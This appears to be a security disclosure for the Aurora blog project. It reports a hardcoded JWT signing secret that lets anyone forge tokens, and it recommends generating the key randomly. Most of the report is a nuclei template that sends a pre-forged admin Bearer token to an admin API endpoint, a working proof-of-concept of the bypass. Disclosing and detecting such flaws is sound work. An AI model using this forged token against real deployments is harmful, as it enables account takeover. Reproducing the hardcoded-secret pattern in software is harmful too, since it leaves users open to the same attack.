[vulnerability] Unauthorised Access Vulnerability

[c41ico]

1. Steps to reproduce

Modify the sub field in jwt to be the id of another user to fake his/her identity.

The nuclei template is as follows

id: aurora-jwt-hardencoding

info:
  name: Aurora blog jwt secret key hardencoding
  author: calico
  severity: high
  description: jwt secret key hardcoding leads to unauthorised access
  reference:
    - https://github.com/linhaojun857/aurora/
  tags: unauth

requests:
  - raw:
      - |+
        GET /api/admin/users/role HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
        Accept: application/json, text/plain, */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJjMThlZTQxYWRmZDk0ZDYyOWQ2ZjExNTAxM2NkMjVmNiIsInN1YiI6IjEiLCJpc3MiOiJodWF3ZWltaWFuIn0.JoipYRzDC3jKAqNhV_0skiq4XikhNCmj2shMl5F1euA
        Connection: close


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":20000'
      - type: status
        status:
          - 200

2. Expected behavior

The JwtAuthenticationTokenFilter gets the jwt from the request via the tokenService#getUserDetailDTO method.

Call the parseToken method to verify that the jwt is valid.

3. Actual behavior

In the parseToken method, get the signing key for jwt via the generalKey method

Since SECRET is hardcoded in the code, the same key is returned in the generalKey method, resulting in a forged jwt

4. Affected Version

latest

5. Fixes Recommendations

Randomly generate the key for jwt when the program is run